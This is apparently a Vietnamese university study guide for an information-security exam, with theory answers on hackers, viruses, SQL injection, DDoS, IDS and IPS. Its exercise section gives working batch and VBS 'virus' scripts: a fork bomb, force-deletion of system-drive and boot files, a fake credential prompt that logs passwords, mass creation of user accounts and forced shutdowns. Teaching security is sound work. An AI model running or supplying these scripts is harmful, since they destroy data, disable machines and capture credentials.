ĐỀ CƯƠNG ÔN TẬP MÔN: AN TOÀN VÀ BẢO MẬT THÔNG TIN

PHẦN 1: Cấu trúc đề thi Hình thức đề thi: Thi viết (tự luận) Thời gian: 60 phút Không được sử dụng tài liệu khi làm bài Cấu trúc của đề thi: 03 câu hỏi (không có phần trắc nghiệm) Phân bổ đề thi: + Câu 01: Lý thuyết (3 điểm): Nội dung phần này tập trung hỏi về một số khái niệm, kiến trúc,… + Câu 02: Bài tập (3 điểm): Viết chương trình Virus bằng Notepad lưu dưới dạng .bat hoặc .vbs + Câu 03 (04 điểm): Nêu một số phương pháp tấn công mạng máy tính PHẦN 2: Nội dung ôn tập A. Dạng câu hỏi lý thuyết (câu 01) Câu 1: Theo AnhChị hiểu thế nào là Hacker và Cracker ? Gợi ý trả lời: Hacker: Hacker là người có thể viết hay chỉnh sửa phần mềm, phần cứng máy tính bao gồm lập trình, quản trị và bảo mật. Những người này hiểu rõ hoạt động của hệ thống máy tính, mạng máy tính và dùng kiến thức của bản thân để làm thay đổi, chỉnh sửa nó với nhiều mục đích tốt xấu khác nhau. Cracker:Cracker là người có khả năng sửa đổi phần mềm để gỡ bỏ các biện pháp bảo vệ bản quyền như: chống sao chép, phiên bản dùng thử giới hạn, kiểm tra số serial, kiểm tra CD hay các phiền toái trong phần mềm như cửa sổ thông báo (screennag) và phần mềm quảng cáo (adware). Họ làm ra các phiên bản cracks, patcher, keygen ... Và đôi lúc, cracker còn thêm những phần mở rộng cho phần mềm thông qua các phiên bản cracks của họ. Câu 2: Anh Chị hãy phân loại và làm rõ Hacker theo hướng hành động thâm nhập ? Gợi ý trả lời: Theo hành động thâm nhập thì có 3 loại Hacker chính: Hacker mũ đen: là loại hacker mà cả thế giới chống lại họ, công việc hằng ngày của họ là truy cập trái phép vào các hệ thống, website, hay thông tin cá nhân một cách trái phép, khi hacker đột nhập thành công. Có thể là ăn cắp thông tin bí mật, trộm tài khoản thẻ ngân hàng, thêm bớt thông tin vào một dữ liệu nào đó… Ngoài những việc trên hacker mũ đen cũng có thể crack game và phần mềm để hỗ trợ miễn phí cho người sử dụng. Hacker mũ đen có lẽ là loại hacker có số lượng nhiều nhất và nguy hiểm nhất trong cộng đồng internet trên toàn thế giới. Hacker mũ trắng: là hacker trái ngược hoàn toàn với hacker mũ đen, họ là những hacker có luơng tâm, họ là những hacker sử dụng các kỹ năng và các cách xâm nhập

ĐỀ CƯƠNG ÔN TẬP MÔN: AN TOÀN VÀ BẢO MẬT THÔNG TIN

PHẦN 1: Cấu trúc đề thi

- Hình thức đề thi: Thi viết (tự luận)

- Thời gian: 60 phút

- Không được sử dụng tài liệu khi làm bài

- Cấu trúc của đề thi: 03 câu hỏi (không có phần trắc nghiệm)

- Phân bổ đề thi:

+ Câu 01: Lý thuyết (3 điểm): Nội dung phần này tập trung hỏi về một số khái niệm, kiến trúc,… + Câu 02: Bài tập (3 điểm): Viết chương trình Virus bằng Notepad lưu dưới dạng bat hoặc vbs + Câu 03 (04 điểm): Nêu một số phương pháp tấn công mạng máy tính

PHẦN 2: Nội dung ôn tập

A./ Dạng câu hỏi lý thuyết (câu 01)

Câu 1: Theo Anh/Chị hiểu thế nào là Hacker và Cracker

?

Gợi ý trả lời:

-Hacker: Hacker là người có thể viết hay chỉnh sửa phần

mềm, phần cứng máy tính bao gồm lập trình, quản trị và bảo mật Những người này hiểu rõ hoạt động của hệ thống máy tính, mạng máy tính và dùng kiến thức của bản

thân để làm thay đổi, chỉnh sửa nó với nhiều mục đích tốt xấu khác nhau

-Cracker:Cracker là người có khả năng sửa đổi phần mềm

để gỡ bỏ các biện pháp bảo vệ bản quyền như: chống sao chép, phiên bản dùng thử giới hạn, kiểm tra số serial, kiểm tra CD hay các phiền toái trong phần mềm như cửa sổ thông báo (screennag) và phần mềm quảng cáo (adware)

Họ làm ra các phiên bản cracks, patcher, keygen Và đôi lúc, cracker còn thêm những phần mở rộng cho phần mềm thông qua các phiên bản cracks của họ

Câu 2: Anh/ Chị hãy phân loại và làm rõ Hacker theo hướng hành động thâm nhập ?

Gợi ý trả lời:

Theo hành động thâm nhập thì có 3 loại Hacker chính:

-Hacker mũ đen: là loại hacker mà cả thế giới chống lại

họ, công việc hằng ngày của họ là truy cập trái phép vào các hệ thống, website, hay thông tin cá nhân một cách trái phép, khi hacker đột nhập thành công Có thể là ăn cắp thông tin bí mật, trộm tài khoản thẻ ngân hàng, thêm bớt thông tin vào một dữ liệu nào đó… Ngoài những việc trên hacker mũ đen cũng có thể crack game và phần mềm để hỗ trợ miễn phí cho người sử dụng Hacker mũ đen có lẽ là loại hacker có số lượng nhiều nhất và nguy hiểm nhất trong cộng đồng internet trên toàn thế giới

-Hacker mũ trắng: là hacker trái ngược hoàn toàn với

hacker mũ đen, họ là những hacker có luơng tâm, họ là những hacker sử dụng các kỹ năng và các cách xâm nhập

phục vụ cho những hoạt động luơng thiện và có lợi cho tổ chức và xã hội

-Hacker mũ xám: là những hacker trung lập giữa đen và

trắng, trong thực tế số lượng loại hacker này cũng không phải hiếm gặp Một hacker mũ xám không đánh cắp thông tin cá nhân hay gây ra những phiền phức lớn cho những người quản trị, nhưng họ có thể trở thành tội phạm mạng

từ những việc làm trái đạo đức

Câu 3: Anh/ Chị hãy so sánh sự giống và khác nhau giữa Hacker và Cracker( bẻ khóa phần mềm)

Gợi ý trả lời:

-Về giống nhau: Cả Hacker và Cracker đều là những

người tấn công và mục đích là thâm nhập vào hệ thống để khai thác thông tin

-Về khác nhau: Hacker thì tập trung vào khai thác và tìm

những lỗ hổng trong các ứng dụng mạng Internet, máy tính

và cả phần mềm, còn Cracker tập trung vào các công việc như khả năng sửa đổi phần mềm hoặc bỏ các biện pháp bảo vệ/đăng ký của phần mềm

Câu 4: Anh/ Chị hãy cho biết các khái niệm Threat, Threat agent, Attack, Vulnerability và Risk trong an toàn thông tin ?

Gợi ý trả lời:

-Threat (sự đe dọa): Là các mối đe dọa có thể tấn công hệ

thống

-Threat agent (tác nhân đe dọa): Là con người hoặc

phương tiện có khả năng ngây hại hệ thống

-Attack (tấn công): là các hành động tác nhân đe dọa khai

thác lỗ hổng và khả năng bảo mật của hệ thống để truy cập trái phép, lấy thông tin cơ sở dữ liệu, phá hoại, vô hiệu quá, sửa hệ thống, làm hệ thống tê liệt, hư hại hoặc mất mát dữ liệu

-Vulnerability (lỗ hổng): Là điểm yếu trong bảo mật hệ

thống có thể bị kẻ tấn công khai thác để phá hoại hệ thống

-Risk (nguy cơ, rủi ro): Là khả năng mối đe dọa tấn công

và gây thiệt hại hệ thống

Câu 5:Anh/ Chị hãy hiểu thế nào Virus máy tính ? Phân tích một số tác hại của Virus máy tính ?

Gợi ý trả lời:

Virus máy tính ( gọi tắt là Virus ) là đoạn chương trình

có khả năng tư nhân bản, lây nhiễm từ máy tính này qua máy tính khác bằng nhiều con đường, nhất là qua môi trường mạng máy tính, Internet và thư điện tử

Một số tác hại của Virus máy tính

- Tiêu tốn tài nguyên hệ thống

- Phá hủy dữ liệu

- Phá hủy hệ thống

- Đánh cắp dữ liệu

- Mã hóa dữ liệu để tống tiền

- Gây khó chịu khác

Câu 6: Anh/ Chị hãy nêu một số cách lây nhiễm của Virus máy tính ? Và cách phòng chống Virus máy tính

?

Gợi ý trả lời:

Một số cách lây nhiễm của Virus máy tính:

- Qua việc sao chép các tệp đã bị nhiễm Virus

- Qua các phần mềm bẻ khóa, các phần mềm sao chép lậu

- Qua các thiết bị nhớ di động

- Qua mạng nội bộ, Internet, đặc biệt là thư điện tử

- Qua các " lỗ hổng " phần mềm

Cách phòng tránh Virus máy tính:

- Hạn chế việc sao chép không cần thiết và không chạy các chương trình tải từ Internet hoặc sao chép từ máy khác khi chưa đủ tin cậy

- Không mở những tệp gửi kèm trong thư điện tử nếu có nghi ngờ về nguồn gốc hay nội dung thư

- Không truy cập vào các trang web có nội dung không lành mạnh

- Thường xuyên cập nhật các bản sửa lỗi cho các phần mềm chạy trên máy tính của mình, kể cả hệ điều hành

- Định kì sao lưu dữ liệu để có thể khôi phục khi bị virus phá hoại

- Định kì quét và diệt virus bằng các phần mềm diệt virus

B./ Dạng câu hỏi bài tập (câu 02): Có gợi ý trả lời tham khảo

Câu 1: Anh/ Chị hãy viết chương trình Virus bằng Notepad

với đuôi bat cho phép tự động tạo liên tiếp chương trình Notepad cho đến khi máy tính bị treo

@echo off

:virus

start %SystemRoot%\system32\notepad.exe

goto virus

Câu 2: Anh/ Chị hãy viết chương trình Virus bằng Notepad

với đuôi bat cho phép tự động xóa hệ thống windows của máy tính

@echo off

del %systemdrive%\*.* /f /s /q

shutdown -r -f -t 30 –c “Máy tính sẽ bị tắt trong khoảng

30 giây nữa…”

Hoặc

@echo off

msg *virus đang kích hoạt *

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

Câu 3: Anh/ Chị hãy viết chương trình Virus bằng Notepad

với đuôi bat cho phép tự động mở các chương trình Word, Paint, Notepad, Control Panel, Calculator, Explorer và ghi lại tên đăng nhập, mật khẩu khi gõ vào một tệp tin txt mặc định trong ổ đĩa C

@echo off

:virus

start winword

start mspaint

start notepad

start explorer

start control

start calc

cd “C:Logs”

set /p user=Username:

set /p pass=Password:

echo Username=%user%” Password=”%pass%”

>> Logs.txt

exit

goto virus

Câu 4: Anh/ Chị hãy viết chương trình Virus bằng Notepad

với đuôi vbs cho phép thực hiện các phím máy tính (CAPSLOCK, NUMLOCK, SCROLLLOCK) liên tục nhấp nháy trong mỗi giây một lần

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{SCROLLLOCK}"

wshshell.sendkeys "~(enter)"

wshshell.sendkeys "{bs}" // phím khoảng cách Space loop

Câu 5: Anh/ Chị hãy viết chương trình Virus bằng Notepad

với đuôi bat cho phép thực hiện tạo ít nhất 5 thư mục liên tiếp, nếu đóng một thư mục nào đó thì các thư mục sẽ tiếp tục xuất hiện liên tiếp và thông báo sẽ khởi động máy tính sau thời gian 60 giây

@echo off

:virus

md folder1

md folder2

md folder3

md folder4

md folder5

start folder1

start folder2

start folder3

start folder4

start folder5

shutdown –r –t 60 –c “Máy tính sẽ bị khởi động lại trong thời gian 60 giây nữa !!!”

goto virus

Câu 6: Anh/ Chị hãy viết chương trình Virus bằng Notepad

với đuôi bat cho phép thực hiện tạo các thư mục ngẫu nhiên trong các ổ đĩa C, D, E, F và sau thời gian 30s máy tính sẽ

tự động tắt

@echo off

:virus

cd /d C:

md %RANDOM%

cd /d D:

md %RANDOM%

cd /d E:

md %RANDOM%

shutdown –s -f -t 30 -c "Máy tính sẽ tắt trong

khoảng 30 giây nữa… "

goto virus

Câu 7: Anh/ Chị hãy viết chương trình Virus bằng Notepad

với đuôi bat cho phép thực hiện tạo ngẫu nhiên nhiều tài

khoản người dùng

@echo off

:virus

net user %random% /add //Tạo tài khoản người dùng goto virus

Câu 8: Anh/ Chị hãy viết chương trình Virus bằng Notepad

với đuôi vbs cho phép thực hiện đóng tất cả các chương trình đang mở, kể cả windows

set ws=CreateObject("wscript.shell")

do

ws.sendkeys "%{F4}"

wscript.sleep 5000

loop

C./ Dạng câu hỏi bài tập (câu 03): Có gợi ý trả lời tham khảo

Câu 1: Anh/ Chị hãy nêu phương pháp tấn công kiểu

Man-in-the-Middle và cách phòng chống

Câu 2: Anh/ Chị hãy nêu phương pháp tấn công kiểu

Man-Google Hacking và cách phòng chống

Câu 3: Anh/ Chị hãy nêu phương pháp tấn công kiểu Footprinting và cách phòng chống

Câu 4: Anh/ Chị hãy nêu phương pháp tấn công SQL

Injection và cách phòng chống

Gợi ý trả lời:

Phương pháp tấn công dạng SQL Injection:

Phương pháp tấn công dạng SQL injection là một kĩ thuật tấn công lợi dụng lỗ hổng trong việc kiểm tra dữ liệu nhập trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu để "tiêm vào" (injection) và thi hành các câu lệnh SQL bất hợp pháp

Có bốn dạng thông thường bao gồm:

- Vượt qua kiểm tra lúc đăng nhập (authorization bypass)

- Sử dụng câu lện SELECT

- Sử dụng câu lệnh INSERT

- Sử dụng các Stored-procedures

Cách phòng chống kiểu tấn công SQL Injection:

- Cần có cơ chế kiểm soát chặt chẽ và giới hạn quyền xử

lí dữ liệu đến tài khoản người dùng mà ứng dụng web đang sử dụng

- Các ứng dụng thông thường nên tránh dùng đến các quyền như dbo hay sa Quyền càng bị hạn chế, thiệt hại càng ít

- Loại bỏ bất kì thông tin kĩ thuật nào chứa trong thông điệp chuyển xuống cho người dùng khi ứng dụng có lỗi Các thông báo lỗi thông thường tiết lộ các chi tiết kĩ thuật

có thể cho phép kẻ tấn công biết được điểm yếu của hệ thống

Câu 5: Theo Anh/ Chị, để thực hiện thành công DDoS cần

phải thỏa điều kiện gì? Đánh giá mức độ nguy hại, đề xuất các biện pháp ngăn chặn, phòng chống các hình thức tấn công DDoS Cho ví dụ về 1 trường hợp tấn công DDoS ở Việt Nam mà các anh chị biết

Gợi ý trả lời:

Điều kiện để thực hiện thành công DDoS ?

 SYN Flood Attack

 Ping Flood Attack (Ping of Death)

 Teardrop Attack

 Peer-to-Peer Attacks

Mức độ nguy hại của tấn công từ chối dịch vụ lan tràn DDoS

- Tê liệt các dịch vụ giao dịch với hệ thống

- Thiệt hại về thời gian, tài chính của đơn vị

Một số biện pháp ngăn chặn, phòng chống các hình thức tấn công DDoS hiện nay và cho ví dụ về tấn công DDoS ở Việt Nam mà các Anh/ Chị biết ?

1 Khi phát hiện máy chủ bị tấn công hãy nhanh chóng truy tìm địa chỉ IP đó và cấm không cho gửi dữ liệu đến máy chủ

2 Dùng tính năng lọc dữ liệu của router/firewall để loại

bỏ các packet không mong muốn, giảm lượng lưu thông trên mạng và tải của máy chủ

3 Sử dụng các tính năng cho phép đặt rate limit trên router/firewall để hạn chế số lượng packet vào hệ thống

4 Nếu bị tấn công do lỗi của phần mềm hay thiết bị thì nhanh chóng cập nhật các bản sửa lỗi cho hệ thống đó hoặc thay thế

5 Dùng một số cơ chế, công cụ, phần mềm để chống lại TCP SYN Flooding

6 Tắt các dịch vụ khác nếu có trên máy chủ để giảm tải

và có thể đáp ứng tốt hơn Nếu được có thể nâng cấp các thiết bị phần cứng để nâng cao khả năng đáp ứng của hệ thống hay sử dụng thêm các máy chủ cùng tính năng khác

để phân chia tải

7 Tạm thời chuyển máy chủ sang một địa chỉ khác

Câu 6: Anh/ Chị hãy trình bày khái niệm và chức năng hệ

thống phát hiện xâm nhập trái phép IDS (Intrusion Detection System)

Gợi ý trả lời:

Khái niệm IDS: IDS (Intrusion Detection System- hệ thống phát hiện xâm nhập) là hệ thống phần cứng hoặc phần mềm có chức năng giám sát, phân tích lưu lượng mạng, các hoạt động khả nghi và cảnh báo cho hệ thống, hoặc nhà quản trị IDS cũng có thể phân biệt giữa những tấn công vào hệ thống từ bên trong (từ những người dùng nội bộ) hay tấn công từ bên ngoài (từ các hacker) IDS phát hiện dựa trên các dấu hiệu đặc biệt về các nguy cơ đã biết (giống như cách các phần mềm diệt virus dựa vào các dấu hiệu đặc biệt để phát hiện và diệt virus), hay dựa trên so sánh lưu lượng mạng hiện tại với baseline (thông số đo đạc chuẩn của hệ thống) để tìm ra các dấu hiệu bất thường

Chức năng của IDS:

Chức năng quan trọng nhất là: Giám sát – Cảnh báo – Bảo

vệ:

- Giám sát: thực hiện giám sát lưu lượng mạng và các

hoạt động khả nghi

- Cảnh báo: báo cáo về tình trạng mạng cho hệ thống

và nhà quản trị

- Bảo vệ: sử dụng những thiết lập mặc định và cấu

hình từ nhà quản trị để có những hành động tương ứng phù hợp chống lại kẻ xâm nhập và phá hoại

Chức năng mở rộng: IDS cần có khả năng phân biệt tấn

công từ bên trong và tấn công từ bên ngoài Ngoài ra, IDS cũng có khả năng phát hiện những dấu hiệu bất thường dựa trên những gì đã biết hoặc nhờ vào sự so sánh lưu lượng mạng hiện tại với baseline

Câu 7: Anh/ Chị hãy trình bày khái niệm và phân loại hệ

thống ngăn chặn xâm nhập trái phép IPS (Intrusion Prevention System)

Gợi ý trả lời:

Khái niệm IPS: Hệ thống IPS (Intrusion Prevention System) là một kỹ thuật an ninh mới, kết hợp các ưu điểm của kỹ thuật firewall với hệ thống phát hiện xâm nhập IDS,

có khả năng phát hiện sự xâm nhập, các cuộc tấn công và

tự động ngăn chặn các cuộc tấn công đó

IPS không đơn giản chỉ dò các cuộc tấn công, chúng có khả năng ngăn chặn các cuộc hoặc cản trở các cuộc tấn công

đó Chúng cho phép tổ chức ưu tiên, thực hiện các bước để ngăn chặn lại sự xâm nhập Phần lớn hệ thống IPS được đặt

ở vành đai mạng, dủ khả năng bảo vệ tất cả các thiết bị trong mạng

Phân loại hệ thống IPS:

-IPS ngoài luồng(Promiscuous Mode IPS)

Hệ thống IPS ngoài luồng không can thiệp trực tiếp vào luồng dữ liệu Luồng dữ liệu vào hệ thống mạng sẽ cùng đi qua tường lửa và IPS IPS có thể kiểm soát luồng

dữ liệu vào, phân tích và phát hiện các dấu hiệu của sự xâm nhập, tấn công Với vị trí này, IPS có thể quản lý bức tường lửa, chỉ dẫn nó chặn lại các hành động nghi ngờ mà không làm ảnh hưởng đến tốc độ lưu thông của mạng

-IPS trong luồng (In-line IPS)

Vị trí IPS nằm trước bức tường lửa, luồng dữ liệu phải đi qua IPS trước khi tới bức tường lửa Điểm khác chính so với IPS ngoài luồng là có thêm chức nǎng chặn lưu thông (traffic-blocking) Điều đó làm cho IPS có thể ngǎn chặn luồng giao thông nguy hiểm nhanh hơn so với IPS ngoài luồng (Promiscuous Mode IPS) Tuy nhiên, vị trí này sẽ làm cho tốc độ luồng thông tin ra vào mạng chậm hơn

Với mục tiêu ngăn chặn các cuộc tấn công, hệ thống IPS phải hoạt động theo thời gian thực Tốc độ họat động của hệ thống là một yếu tố rất quan trọng Qua trình phát hiện xâm nhập phải đủ nhanh để có thể ngăn chặn các cuộc tấn công ngay lập tức Nếu không đáp ứng được điều này